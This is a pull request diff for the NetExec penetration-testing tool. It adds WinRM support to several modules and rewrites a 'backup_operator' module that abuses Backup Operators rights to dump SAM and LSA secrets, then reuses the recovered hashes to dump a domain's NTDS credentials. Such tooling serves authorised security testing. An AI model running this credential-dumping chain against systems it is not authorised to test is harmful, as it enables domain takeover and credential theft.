### PR TITLE
backup_operator: winrm support and query-based smb extraction

### DIFF
--- a/nxc/modules/backup_operator.py
+++ b/nxc/modules/backup_operator.py
@@ -1,205 +1,232 @@
 import contextlib
 import re
+from binascii import unhexlify
 
-from impacket.examples.secretsdump import SAMHashes, LSASecrets, LocalOperations
-from impacket.smbconnection import SessionError
 from impacket.dcerpc.v5 import rrp
+from impacket.examples.secretsdump import SAMHashes, LSASecrets, LocalOperations
+from impacket.examples.regsecrets import (
+    RemoteOperations as RegSecretsRemoteOperations,
+    SAMHashes as RegSecretsSAMHashes,
+    LSASecrets as RegSecretsLSASecrets,
+)
 from nxc.helpers.misc import CATEGORY, gen_random_string
-from nxc.helpers.rpc import NXCRPCConnection
+
+TEMP_DIR = "C:\\Windows\\Temp"
+
+
+class BackupOperatorRemoteOperations(RegSecretsRemoteOperations):
+    """regsecrets RemoteOperations without the SCMR service handling: its
+    status check opens the service manager and the RemoteRegistry service
+    with rights a backup operator does not have. Opening the winreg pipe
+    trigger-starts the service instead, so only the bind is needed.
+    """
+
+    def enableRegistry(self):
+        self._RemoteOperations__connectWinReg()
+
+    def getBootKey(self):
+        # regsecrets opens the Lsa class keys without backup intent, which
+        # is denied to a backup operator: SeBackupPrivilege covers the
+        # backup-intent open instead
+        boot_key = b""
+        self.openHKLMHandle()
+        for key in ["JD", "Skew1", "GBG", "Data"]:
+            ans = rrp.hBaseRegOpenKey(
+                self._RemoteOperations__rrp,
+                self._RemoteOperations__regHandle,
+                f"SYSTEM\\CurrentControlSet\\Control\\Lsa\\{key}",
+                dwOptions=rrp.REG_OPTION_BACKUP_RESTORE | rrp.REG_OPTION_OPEN_LINK,
+                samDesired=rrp.KEY_READ,
+            )
+            key_handle = ans["phkResult"]
+            info = rrp.hBaseRegQueryInfoKey(self._RemoteOperations__rrp, key_handle)
+            boot_key += info["lpClassOut"][:-1].encode("utf-8")
+            rrp.hBaseRegCloseKey(self._RemoteOperations__rrp, key_handle)
+
+        boot_key = unhexlify(boot_key)
+        transforms = [8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7]
+        return bytes(boot_key[transforms[i]] for i in range(len(boot_key)))
 
 
 class NXCModule:
     name = "backup_operator"
     description = "Exploit user in backup operator group to dump NTDS @mpgn_x64"
-    supported_protocols = ["smb"]
+    supported_protocols = ["smb", "winrm"]
     category = CATEGORY.PRIVILEGE_ESCALATION
 
     def __init__(self, context=None, module_options=None):
         self.context = context
         self.module_options = module_options
-        self.local_admin = None
-        self.local_admin_hash = None
-        self.machine_account = None
-        self.machine_account_hash = None
-        self.cleanup_user = None
-        self.cleanup_hash = None
 
     def options(self, context, module_options):
         """NO OPTIONS"""
 
     def on_login(self, context, connection):
-        connection.args.share = "SYSVOL"
-        rand_suffix = gen_random_string(8)
+        if connection.protocol == "winrm":
+            BackupOperator_WinRM(context, connection).run()
+        else:
+            BackupOperator_Smb(context, connection).run()
 
-        # enable remote registry
-        context.log.display("Triggering RemoteRegistry to start through named pipe...")
-        connection.trigger_winreg()
-        dce = NXCRPCConnection(connection).connect(r"\winreg", rrp.MSRPC_UUID_RRP)
 
-        try:
-            for hive in ["HKLM\\SAM", "HKLM\\SYSTEM", "HKLM\\SECURITY"]:
-                hRootKey, subKey = self._strip_root_key(dce, hive)
-                outputFileName = f"\\\\{connection.host}\\SYSVOL\\{subKey}_{rand_suffix}"
-                context.log.debug(f"Dumping {hive}, be patient it can take a while for large hives (e.g. HKLM\\SYSTEM)")
-                try:
-                    ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey, dwOptions=rrp.REG_OPTION_BACKUP_RESTORE | rrp.REG_OPTION_OPEN_LINK, samDesired=rrp.KEY_READ)
-                    rrp.hBaseRegSaveKey(dce, ans2["phkResult"], outputFileName)
-                    context.log.highlight(f"Saved {hive} to {outputFileName}")
-                except Exception as e:
-                    context.log.fail(f"Couldn't save {hive}: {e} on path {outputFileName}")
-                    return
-        except (Exception, KeyboardInterrupt) as e:
-            context.log.fail(f"Unexpected error: {e}")
+class BackupOperator:
+    """Common state and helpers shared by the protocol classes below."""
+
+    HIVES = ["SAM", "SECURITY", "SYSTEM"]
+
+    def __init__(self, context, connection):
+        self.context = context
+        self.connection = connection
+        self.local_admin = None
+        self.local_admin_hash = None
+        self.machine_account = None
+        self.machine_account_hash = None
+
+    def _parse_sam_secret(self, secret):
+        self.context.log.highlight(secret)
+        if not self.local_admin:
+            first_line = secret.strip().splitlines()[0]
+            fields = first_line.split(":")
+            if len(fields) >= 4:
+                self.local_admin = fields[0]
+                self.local_admin_hash = fields[3]
+
+    def _parse_lsa_secret(self, secret_type, secret):
+        self.context.log.highlight(secret)
+        if self.machine_account:
             return
-        finally:
-            with contextlib.suppress(Exception):
-                dce.disconnect()
+        for line in secret.splitlines():
+            match = re.search(r"aad3b435b51404eeaad3b435b51404ee:([0-9a-f]{32})", line, re.IGNORECASE)
+            if match:
+                self.machine_account_hash = match.group(1)
+                account_name = line.split(":", 1)[0].strip().split("\\")[-1]
+                # "$MACHINE.ACC" has no real name -> derive it from the connection.
+                self.machine_account = account_name if account_name.endswith("$") else f"{self.connection.hostname}$"
+                return
 
-        # copy remote file to local
-        log_path = f"{connection.output_filename}."
-        for hive in ["SAM", "SECURITY", "SYSTEM"]:
-            connection.get_file_single(f"{hive}_{rand_suffix}", log_path + hive)
-
-        # read local file
+    def _parse_local_hives(self, log_path, skip_lsa=False):
         try:
-            def parse_sam(secret):
-                context.log.highlight(secret)
-                if not self.local_admin:
-                    first_line = secret.strip().splitlines()[0]
-                    fields = first_line.split(":")
-                    if len(fields) >= 4:
-                        self.local_admin = fields[0]
-                        self.local_admin_hash = fields[3]
-
-            def parse_lsa(secret_type, secret):
-                context.log.highlight(secret)
-                if self.machine_account:
-                    return
-                for line in secret.splitlines():
-                    match = re.search(r"aad3b435b51404eeaad3b435b51404ee:([0-9a-f]{32})", line, re.IGNORECASE)
-                    if match:
-                        self.machine_account_hash = match.group(1)
-                        account_name = line.split(":", 1)[0].strip().split("\\")[-1]
-                        # "$MACHINE.ACC" has no real name -> derive it from the connection.
-                        self.machine_account = account_name if account_name.endswith("$") else f"{connection.hostname}$"
-                        return
-
             local_operations = LocalOperations(log_path + "SYSTEM")
             boot_key = local_operations.getBootKey()
-            sam_hashes = SAMHashes(log_path + "SAM", boot_key, isRemote=False, perSecretCallback=parse_sam)
+            sam_hashes = SAMHashes(log_path + "SAM", boot_key, isRemote=False, perSecretCallback=self._parse_sam_secret)
             sam_hashes.dump()
             sam_hashes.finish()
 
-            LSA = LSASecrets(log_path + "SECURITY", boot_key, None, isRemote=False, perSecretCallback=parse_lsa)
-            LSA.dumpCachedHashes()
-            LSA.dumpSecrets()
+            if not skip_lsa:
+                lsa_secrets = LSASecrets(log_path + "SECURITY", boot_key, None, isRemote=False, perSecretCallback=self._parse_lsa_secret)
+                lsa_secrets.dumpCachedHashes()
+                lsa_secrets.dumpSecrets()
+        except Exception as e:
+            self.context.log.fail(f"Fail to dump the sam and lsa: {e!s}")
+
+
+class BackupOperator_Smb(BackupOperator):
+    def run(self):
+        # The regsecrets extraction walks the hives with backup-intent opens
+        # and registry queries: no RegSaveKey, no hive file dropped on the
+        # target, the backup operator SeBackupPrivilege covers it all.
+        # Local backup operators only work with LocalAccountTokenFilterPolicy
+        # set on the target: the UAC-filtered network token of a local
+        # account drops SeBackupPrivilege, domain accounts are not filtered.
+        context = self.context
+        context.log.display("Dumping SAM and LSA secrets through the registry...")
+        # open the winreg pipe so the trigger-started RemoteRegistry spins
+        # up without any service rights: enableRegistry would otherwise try
+        # to start it through SCMR, which a backup operator cannot
+        self.connection.trigger_winreg()
+        remote_ops = None
+        try:
+            remote_ops = BackupOperatorRemoteOperations(self.connection.conn, self.connection.kerberos, self.connection.kdcHost)
+            remote_ops.enableRegistry()
+            bootkey = remote_ops.getBootKey()
+
+            sam = RegSecretsSAMHashes(bootkey, remoteOps=remote_ops, perSecretCallback=self._parse_sam_secret)
+            sam.dump()
+            lsa = RegSecretsLSASecrets(bootkey, remoteOps=remote_ops, perSecretCallback=self._parse_lsa_secret)
+            lsa.dumpCachedHashes()
+            lsa.dumpSecrets()
         except Exception as e:
             context.log.fail(f"Fail to dump the sam and lsa: {e!s}")
+            return
+        finally:
+            if remote_ops is not None:
+                with contextlib.suppress(Exception):
+                    remote_ops.finish()
 
-        dump_creds = None
+        # The machine account can DCSync, the RID 500 hash is the local
+        # (domain on a DC) administrator
         for username, user_hash in [(self.machine_account, self.machine_account_hash), (self.local_admin, self.local_admin_hash)]:
-            if self._try_dump_ntds(connection, context, username, user_hash):
-                dump_creds = (username, user_hash)
+            if self._try_dump_ntds(username, user_hash):
                 break
 
-        if dump_creds:
-            self.cleanup_user, self.cleanup_hash = self._extract_da_hash(connection.output_filename, context)
-            if not self.cleanup_user or not self.cleanup_hash:
-                self.cleanup_user, self.cleanup_hash = dump_creds
-
-            self._perform_cleanup(connection, context, self.cleanup_user, self.cleanup_hash, rand_suffix)
-        else:
-            context.log.fail("Failed to obtain suitable credentials for NTDS dump or cleanup.")
-            self._print_cleanup_warning(context, rand_suffix)
-
-    def _try_dump_ntds(self, connection, context, username, user_hash):
+    def _try_dump_ntds(self, username, user_hash):
         if not username or not user_hash:
             return False
         with contextlib.suppress(Exception):
-            connection.conn.logoff()
-        connection.create_conn_obj()
-        if connection.hash_login(connection.domain, username, user_hash):
+            self.connection.conn.logoff()
+        self.connection.create_conn_obj()
+        if self.connection.hash_login(self.connection.domain, username, user_hash):
             try:
-                context.log.display(f"Dumping NTDS using {username}...")
-                connection.ntds()
+                self.context.log.display(f"Dumping NTDS using {username}...")
+                self.connection.ntds()
                 return True
             except Exception as e:
-                context.log.fail(f"Fail to dump the NTDS with {username}: {e!s}")
+                self.context.log.fail(f"Fail to dump the NTDS with {username}: {e!s}")
         return False
 
-    def _perform_cleanup(self, connection, context, username, user_hash, rand_suffix):
-        if not username or not user_hash:
-            self._print_cleanup_warning(context, rand_suffix)
+
+class BackupOperator_WinRM(BackupOperator):
+    CLEANUP_DIR = TEMP_DIR
+
+    def run(self):
+        rand_suffix = gen_random_string(8)
+        log_path = f"{self.connection.output_filename}."
+
+        # Dos attack prevent: reg save refuses to overwrite an existing file
+        # with an interactive "(Yes/No)?" prompt, and the runspace hosting
+        # the command is not a tty - pypsrp never gets an answer and loops
+        # the command until the target runs out of memory. Random store
+        # names prevent any preexisting file from matching. One reg save per hive: as a plain
+        # backup operator reg save is refused on HKLM\SECURITY (SAM and
+        # SYSTEM still go through), so one hive failing must not abort the
+        # whole dump.
+        self.context.log.display("Saving SAM, SECURITY and SYSTEM with reg save (SeBackupPrivilege)...")
+        for hive in self.HIVES:
+            # a backup operator with WinRM access does not necessarily have
+            # a WinRS cmd shell, run the command through a runspace
+            self.connection.ps_execute(f"cmd /c 'reg save HKLM\\{hive} {TEMP_DIR}\\{hive}_{rand_suffix}'", True)
+
+        saved_hives = []
+        for hive in self.HIVES:
+            if self.connection.file_transfer.get_file(f"{TEMP_DIR}\\{hive}_{rand_suffix}", log_path + hive):
+                saved_hives.append(hive)
+            else:
+                self.context.log.debug(f"Couldn't fetch the {hive} hive")
+        if "SAM" not in saved_hives or "SYSTEM" not in saved_hives:
+            self.context.log.fail("Couldn't fetch the SAM or SYSTEM hive")
+            self._print_cleanup_warning(rand_suffix)
             return
-        context.log.display(f"Using {username} to clean up files...")
-        with contextlib.suppress(Exception):
-            connection.conn.logoff()
-        connection.create_conn_obj()
-        if connection.hash_login(connection.domain, username, user_hash):
-            context.log.display(f"Cleaning dump with user {username} on domain {connection.domain}")
-            hives = ["SAM", "SECURITY", "SYSTEM"]
-            all_deleted = True
-            for hive in hives:
-                remote_name = f"{hive}_{rand_suffix}"
-                try:
-                    connection.conn.deleteFile("SYSVOL", remote_name)
-                    context.log.debug(f"File {remote_name} deleted successfully via SMB.")
-                except SessionError as e:
-                    if "STATUS_NO_SUCH_FILE" in str(e):
-                        context.log.debug(f"File {remote_name} already removed or not found.")
-                        continue
-                    if "STATUS_ACCESS_DENIED" in str(e):
-                        context.log.debug(f"SMB deleteFile for {remote_name} got access denied. Attempting deletion via cmd execution...")
-                        try:
-                            connection.execute(f"del C:\\Windows\\sysvol\\sysvol\\{remote_name}")
-                            continue
-                        except Exception as exec_err:
-                            context.log.debug(f"Failed to delete {remote_name} via command execution: {exec_err}")
-                    all_deleted = False
-                    context.log.fail(f"Fail to remove the file {remote_name}: {e!s}")
 
-            if all_deleted:
-                double_check = True
-                for hive in hives:
-                    remote_name = f"{hive}_{rand_suffix}"
-                    try:
-                        if connection.conn.listPath("SYSVOL", remote_name):
-                            double_check = False
-                            context.log.fail(f"File {remote_name} still exists on C:\\Windows\\sysvol\\sysvol\\{remote_name}")
-                    except SessionError:
-                        pass
-                if double_check:
-                    context.log.display("Successfully deleted dump files !")
-                    return
+        skip_lsa = "SECURITY" not in saved_hives
+        if skip_lsa:
+            self.context.log.display("SECURITY hive not saved (often refused to backup operators over reg save): skipping LSA secrets")
+        self._parse_local_hives(log_path, skip_lsa=skip_lsa)
 
-        self._print_cleanup_warning(context, rand_suffix)
+        # no NTDS dump over winrm: the smb chain escalates to the machine
+        # account for a DCSync, and there is no winrm equivalent - shadow
+        # copies and vssadmin need an administrator
+        self.context.log.display("NTDS cannot be dumped as a backup operator over winrm")
 
-    def _extract_da_hash(self, output_filename, context):
-        try:
-            with open(f"{output_filename}.ntds") as f:
-                fallback = None
-                for line in f:
-                    fields = line.strip().split(":")
-                    if len(fields) < 4 or not fields[3]:
-                        continue
-                    da_user = fields[0].split("\\")[-1] if "\\" in fields[0] else fields[0]
-                    if fields[1] == "500":
-                        return da_user, fields[3]
-                    if fallback is None:
-                        fallback = (da_user, fields[3])
-                if fallback:
-                    return fallback
-        except Exception as e:
-            context.log.debug(f"Failed to read NTDS file for cleanup: {e}")
-        return None, None
+        if self._delete_dump_files(rand_suffix):
+            self.context.log.display("Successfully deleted dump files !")
+        else:
+            self._print_cleanup_warning(rand_suffix)
 
-    def _print_cleanup_warning(self, context, rand_suffix):
-        context.log.fail(f"Files were not automatically deleted. Please clean up manually: C:\\Windows\\sysvol\\sysvol\\SECURITY_{rand_suffix}, SAM_{rand_suffix}, SYSTEM_{rand_suffix}")
+    def _delete_dump_files(self, rand_suffix):
+        # clean up our own dump files in the same session: dir lists what is
+        # left after the delete, no output means the files are gone
+        files = " ".join(f"{TEMP_DIR}\\{hive}_{rand_suffix}" for hive in self.HIVES)
+        leftover = self.connection.ps_execute(f"cmd /c 'del {files} 2>nul & dir /b {files} 2>nul'", True) or ""
+        return not leftover.strip()
 
-    def _strip_root_key(self, dce, key_name):
-        # Let's strip the root key
-        key_name.split("\\")[0]
-        sub_key = "\\".join(key_name.split("\\")[1:])
-        ans = rrp.hOpenLocalMachine(dce)
-        h_root_key = ans["phKey"]
-        return h_root_key, sub_key
+    def _print_cleanup_warning(self, rand_suffix):
+        self.context.log.fail(f"Files were not automatically deleted. Please clean up manually: {self.CLEANUP_DIR}\\SECURITY_{rand_suffix}, SAM_{rand_suffix}, SYSTEM_{rand_suffix}")

--- a/nxc/modules/bitlocker.py
+++ b/nxc/modules/bitlocker.py
@@ -1,7 +1,5 @@
 import re
-from impacket.dcerpc.v5.dcom import wmi
 from impacket.dcerpc.v5.dtypes import NULL
-from impacket.dcerpc.v5.dcomrt import DCOMConnection
 from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY
 from nxc.helpers.misc import CATEGORY
 
@@ -75,67 +73,44 @@ class BitLockerWMI:
         self.connection = connection
 
     def check_bitlocker_status(self):
+        # Reuse the wmi protocol's authenticated IWbemLevel1Login instead of
+        # creating a second DCOMConnection to the same target (whose disconnect
+        # would clash with the protocol's own)
         try:
-            # Create a DCOM connection
-            dcom_conn = DCOMConnection(
-                self.connection.host,
-                self.connection.username,
-                self.connection.password,
-                self.connection.domain,
-                self.connection.lmhash,
-                self.connection.nthash,
-                oxidResolver=True,
-                doKerberos=self.connection.kerberos,
-                kdcHost=self.connection.kdcHost)
+            iWbemLevel1Login = self.connection.iWbemLevel1Login
+            bitlockerNamespace = "root\\CIMv2\\Security\\MicrosoftVolumeEncryption"
+            iWbemServices = iWbemLevel1Login.NTLMLogin(bitlockerNamespace, NULL, NULL)
+            iWbemLevel1Login.RemRelease()
+            iWbemServices.get_dce_rpc().set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
+
+            classQuery = "SELECT DriveLetter, ProtectionStatus, EncryptionMethod FROM Win32_EncryptableVolume"
+            iEnumWbemClassObject = iWbemServices.ExecQuery(classQuery)
+            encryptionTypeMapping = {
+                0: "None",
+                1: "AES_128_WITH_DIFFUSER",
+                2: "AES_256_WITH_DIFFUSER",
+                3: "AES_128",
+                4: "AES_256",
+                5: "HARDWARE_ENCRYPTION",
+                6: "XTS_AES_128",
+                7: "XTS_AES_256_WITH_DIFFUSER"
+            }
 
             try:
-                # CoCreateInstanceEx for WMI login
-                i_interface = dcom_conn.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)
-                iWbemLevel1Login = wmi.IWbemLevel1Login(i_interface)
+                while True:
+                    iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff, 1)
+                    encryptionMethod = int(iWbemClassObject[0].EncryptionMethod)
+                    if iWbemClassObject[0].ProtectionStatus == 1:
+                        self.context.log.highlight(f"BitLocker is enabled on drive {iWbemClassObject[0].DriveLetter} (Encryption Method: {encryptionTypeMapping.get(encryptionMethod, 'Unknown')})")
+                    else:
+                        if encryptionMethod == 0:  # Should be 0 if disabled
+                            self.context.log.highlight(f"BitLocker is disabled on drive {iWbemClassObject[0].DriveLetter}")
+            except Exception:
+                pass  # Using pass because if try to log or printing, getting "WMI Session Error: code: 0x1 - WBEM_S_FALSE"
 
-                # Specify the namespace for BitLocker
-                bitlockerNamespace = "root\\CIMv2\\Security\\MicrosoftVolumeEncryption"
-
-                # NTLM login for WMI
-                iWbemServices = iWbemLevel1Login.NTLMLogin(bitlockerNamespace, NULL, NULL)
-
-                # Set authentication level
-                iWbemServices.get_dce_rpc().set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
-
-                # Query to get BitLocker status
-                classQuery = "SELECT DriveLetter, ProtectionStatus, EncryptionMethod FROM Win32_EncryptableVolume"
-                iEnumWbemClassObject = iWbemServices.ExecQuery(classQuery)
-                encryptionTypeMapping = {
-                    0: "None",
-                    1: "AES_128_WITH_DIFFUSER",
-                    2: "AES_256_WITH_DIFFUSER",
-                    3: "AES_128",
-                    4: "AES_256",
-                    5: "HARDWARE_ENCRYPTION",
-                    6: "XTS_AES_128",
-                    7: "XTS_AES_256_WITH_DIFFUSER"
-                }
-
-                try:
-                    while True:
-                        iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff, 1)
-                        encryptionMethod = int(iWbemClassObject[0].EncryptionMethod)
-                        if iWbemClassObject[0].ProtectionStatus == 1:
-                            self.context.log.highlight(f"BitLocker is enabled on drive {iWbemClassObject[0].DriveLetter} (Encryption Method: {encryptionTypeMapping.get(encryptionMethod, 'Unknown')})")
-                        else:
-                            if encryptionMethod == 0:  # Should be 0 if disabled
-                                self.context.log.highlight(f"BitLocker is disabled on drive {iWbemClassObject[0].DriveLetter}")
-                except Exception:
-                    pass  # Using pass because if try to log or printing, getting "WMI Session Error: code: 0x1 - WBEM_S_FALSE"
-
-                # Release resources
-                iWbemLevel1Login.RemRelease()
-                iWbemServices.RemRelease()
-                dcom_conn.disconnect()
-            except Exception as e:
-                if "WBEM_E_INVALID_NAMESPACE" in str(e):
-                    self.context.log.fail("BitLockerNamespace not found on target.")
-                    dcom_conn.disconnect()
+            iWbemServices.RemRelease()
         except Exception as e:
-            self.context.log.error(f"Error occurred during BitLocker check: {e}")
-            dcom_conn.disconnect()
+            if "WBEM_E_INVALID_NAMESPACE" in str(e):
+                self.context.log.fail("BitLockerNamespace not found on target.")
+            else:
+                self.context.log.exception(f"Exception occurred: {e}")

--- a/nxc/modules/bitlocker.py
+++ b/nxc/modules/bitlocker.py
@@ -1,13 +1,16 @@
 import re
+from impacket.dcerpc.v5.dcom import wmi
 from impacket.dcerpc.v5.dtypes import NULL
+from impacket.dcerpc.v5.dcomrt import DCOMConnection
 from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY
 from nxc.helpers.misc import CATEGORY
+from nxc.protocols.winrm.faults import FAULT_DESTINATION_UNREACHABLE, is_fault
 
 
 class NXCModule:
     name = "bitlocker"
     description = "Enumerating BitLocker Status on target(s) If it is enabled or disabled."
-    supported_protocols = ["smb", "wmi"]
+    supported_protocols = ["smb", "wmi", "winrm"]
     category = CATEGORY.ENUMERATION
 
     def __init__(self, context=None, module_options=None):
@@ -23,7 +26,9 @@ class NXCModule:
         """
 
     def on_admin_login(self, context, connection):
-        if context.protocol == "smb":
+        if context.protocol == "winrm":
+            BitLockerWinRM(context, connection).check_bitlocker_status()
+        elif context.protocol == "smb":
             bitlocker_smb = BitLockerSMB(context, connection)
             bitlocker_smb.check_bitlocker_status()
         elif context.protocol == "wmi":
@@ -73,18 +78,83 @@ class BitLockerWMI:
         self.connection = connection
 
     def check_bitlocker_status(self):
-        # Reuse the wmi protocol's authenticated IWbemLevel1Login instead of
-        # creating a second DCOMConnection to the same target (whose disconnect
-        # would clash with the protocol's own)
         try:
-            iWbemLevel1Login = self.connection.iWbemLevel1Login
-            bitlockerNamespace = "root\\CIMv2\\Security\\MicrosoftVolumeEncryption"
-            iWbemServices = iWbemLevel1Login.NTLMLogin(bitlockerNamespace, NULL, NULL)
-            iWbemLevel1Login.RemRelease()
-            iWbemServices.get_dce_rpc().set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
+            # Create a DCOM connection
+            dcom_conn = DCOMConnection(
+                self.connection.host,
+                self.connection.username,
+                self.connection.password,
+                self.connection.domain,
+                self.connection.lmhash,
+                self.connection.nthash,
+                oxidResolver=True,
+                doKerberos=self.connection.kerberos,
+                kdcHost=self.connection.kdcHost)
 
-            classQuery = "SELECT DriveLetter, ProtectionStatus, EncryptionMethod FROM Win32_EncryptableVolume"
-            iEnumWbemClassObject = iWbemServices.ExecQuery(classQuery)
+            try:
+                # CoCreateInstanceEx for WMI login
+                i_interface = dcom_conn.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)
+                iWbemLevel1Login = wmi.IWbemLevel1Login(i_interface)
+
+                # Specify the namespace for BitLocker
+                bitlockerNamespace = "root\\CIMv2\\Security\\MicrosoftVolumeEncryption"
+
+                # NTLM login for WMI
+                iWbemServices = iWbemLevel1Login.NTLMLogin(bitlockerNamespace, NULL, NULL)
+
+                # Set authentication level
+                iWbemServices.get_dce_rpc().set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
+
+                # Query to get BitLocker status
+                classQuery = "SELECT DriveLetter, ProtectionStatus, EncryptionMethod FROM Win32_EncryptableVolume"
+                iEnumWbemClassObject = iWbemServices.ExecQuery(classQuery)
+                encryptionTypeMapping = {
+                    0: "None",
+                    1: "AES_128_WITH_DIFFUSER",
+                    2: "AES_256_WITH_DIFFUSER",
+                    3: "AES_128",
+                    4: "AES_256",
+                    5: "HARDWARE_ENCRYPTION",
+                    6: "XTS_AES_128",
+                    7: "XTS_AES_256_WITH_DIFFUSER"
+                }
+
+                try:
+                    while True:
+                        iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff, 1)
+                        encryptionMethod = int(iWbemClassObject[0].EncryptionMethod)
+                        if iWbemClassObject[0].ProtectionStatus == 1:
+                            self.context.log.highlight(f"BitLocker is enabled on drive {iWbemClassObject[0].DriveLetter} (Encryption Method: {encryptionTypeMapping.get(encryptionMethod, 'Unknown')})")
+                        else:
+                            if encryptionMethod == 0:  # Should be 0 if disabled
+                                self.context.log.highlight(f"BitLocker is disabled on drive {iWbemClassObject[0].DriveLetter}")
+                except Exception:
+                    pass  # Using pass because if try to log or printing, getting "WMI Session Error: code: 0x1 - WBEM_S_FALSE"
+
+                # Release resources
+                iWbemLevel1Login.RemRelease()
+                iWbemServices.RemRelease()
+                dcom_conn.disconnect()
+            except Exception as e:
+                if "WBEM_E_INVALID_NAMESPACE" in str(e):
+                    self.context.log.fail("BitLockerNamespace not found on target.")
+                    dcom_conn.disconnect()
+        except Exception as e:
+            self.context.log.error(f"Error occurred during BitLocker check: {e}")
+            dcom_conn.disconnect()
+
+
+class BitLockerWinRM:
+    def __init__(self, context, connection):
+        self.context = context
+        self.connection = connection
+
+    def check_bitlocker_status(self):
+        try:
+            records = self.connection.wql_enumerate(
+                "SELECT DriveLetter, ProtectionStatus, EncryptionMethod FROM Win32_EncryptableVolume",
+                "root\\CIMv2\\Security\\MicrosoftVolumeEncryption",
+            )
             encryptionTypeMapping = {
                 0: "None",
                 1: "AES_128_WITH_DIFFUSER",
@@ -93,24 +163,17 @@ class BitLockerWMI:
                 4: "AES_256",
                 5: "HARDWARE_ENCRYPTION",
                 6: "XTS_AES_128",
-                7: "XTS_AES_256_WITH_DIFFUSER"
+                7: "XTS_AES_256_WITH_DIFFUSER",
             }
-
-            try:
-                while True:
-                    iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff, 1)
-                    encryptionMethod = int(iWbemClassObject[0].EncryptionMethod)
-                    if iWbemClassObject[0].ProtectionStatus == 1:
-                        self.context.log.highlight(f"BitLocker is enabled on drive {iWbemClassObject[0].DriveLetter} (Encryption Method: {encryptionTypeMapping.get(encryptionMethod, 'Unknown')})")
-                    else:
-                        if encryptionMethod == 0:  # Should be 0 if disabled
-                            self.context.log.highlight(f"BitLocker is disabled on drive {iWbemClassObject[0].DriveLetter}")
-            except Exception:
-                pass  # Using pass because if try to log or printing, getting "WMI Session Error: code: 0x1 - WBEM_S_FALSE"
-
-            iWbemServices.RemRelease()
+            for record in records:
+                drive_letter = record.get("DriveLetter")
+                if int(record.get("ProtectionStatus", 0)) == 1:
+                    method = int(record.get("EncryptionMethod", 0))
+                    self.context.log.highlight(f"BitLocker is enabled on drive {drive_letter} (Encryption Method: {encryptionTypeMapping.get(method, 'Unknown')})")
+                elif int(record.get("EncryptionMethod", 0)) == 0:
+                    self.context.log.highlight(f"BitLocker is disabled on drive {drive_letter}")
         except Exception as e:
-            if "WBEM_E_INVALID_NAMESPACE" in str(e):
+            if "WBEM_E_INVALID_NAMESPACE" in str(e) or "InvalidNamespace" in str(e) or is_fault(e, FAULT_DESTINATION_UNREACHABLE):
                 self.context.log.fail("BitLockerNamespace not found on target.")
             else:
                 self.context.log.exception(f"Exception occurred: {e}")

--- a/nxc/modules/enum_dns.py
+++ b/nxc/modules/enum_dns.py
@@ -12,7 +12,7 @@ class NXCModule:
 
     name = "enum_dns"
     description = "Uses WMI to dump DNS from an AD DNS Server"
-    supported_protocols = ["smb", "wmi"]
+    supported_protocols = ["smb", "wmi", "winrm"]
     category = CATEGORY.ENUMERATION
 
     def __init__(self, context=None, module_options=None):
@@ -31,6 +31,9 @@ class NXCModule:
             domains = []
             output = connection.wmi_query("Select Name FROM MicrosoftDNS_Zone", "root\\microsoftdns")
             domains = [result["Name"]["value"] for result in output] if output else []
+            if not domains:
+                context.log.fail("No DNS zones found (is this a DNS server?)")
+                return
             context.log.success(f"Domains retrieved: {domains}")
         else:
             domains = [self.domains]

--- a/nxc/modules/get_netconnections.py
+++ b/nxc/modules/get_netconnections.py
@@ -14,7 +14,7 @@ class NXCModule:
 
     name = "get_netconnections"
     description = "Uses WMI to query network connections."
-    supported_protocols = ["smb", "wmi"]
+    supported_protocols = ["smb", "wmi", "winrm"]
     category = CATEGORY.ENUMERATION
 
     def options(self, context, module_options):
@@ -25,7 +25,7 @@ class NXCModule:
         cards = connection.wmi_query("select DNSDomainSuffixSearchOrder, IPAddress from win32_networkadapterconfiguration")
         if cards:
             for c in cards:
-                if c["IPAddress"].get("value"):
+                if c.get("IPAddress", {}).get("value"):
                     context.log.success(f"IP Address: {c['IPAddress']['value']}\tSearch Domain: {c['DNSDomainSuffixSearchOrder']['value']}")
 
             data.append(cards)

--- a/nxc/modules/rdp.py
+++ b/nxc/modules/rdp.py
@@ -101,7 +101,8 @@ class NXCModule:
                             context.log.fail("Looks like target system version is under NT6, please add 'OLD=true' in module options.")
                         else:
                             context.log.fail(str(e))
-                wmi_rdp._RdpWmi__dcom.disconnect()
+                if wmi_rdp._RdpWmi__dcom is not None:
+                    wmi_rdp._RdpWmi__dcom.disconnect()
 
 
 class RdpSmb:
@@ -221,6 +222,14 @@ class RdpWmi:
         self.__remoteHost = connection.host
         self.__aesKey = connection.aesKey
         self.__timeout = timeout
+
+        self.__dcom = None
+        if self.__currentprotocol == "wmi":
+            # The wmi protocol already holds an authenticated IWbemLevel1Login:
+            # reuse it instead of creating a second DCOMConnection to the same
+            # target (whose disconnect would clash with the protocol's own)
+            self.__iWbemLevel1Login = connection.iWbemLevel1Login
+            return
 
         try:
             self.__dcom = DCOMConnection(

--- a/nxc/modules/rdp.py
+++ b/nxc/modules/rdp.py
@@ -15,7 +15,7 @@ import contextlib
 class NXCModule:
     name = "rdp"
     description = "Enables/Disables RDP"
-    supported_protocols = ["smb", "wmi"]
+    supported_protocols = ["smb", "wmi", "winrm"]
     category = CATEGORY.PRIVILEGE_ESCALATION
 
     def __init__(self, context=None, module_options=None):
@@ -32,6 +32,7 @@ class NXCModule:
         nxc smb 192.168.1.1 -u {user} -p {password} -M rdp -o ACTION={enable, disable, enable-ram, disable-ram} {OLD=true} {DCOM-TIMEOUT=5}
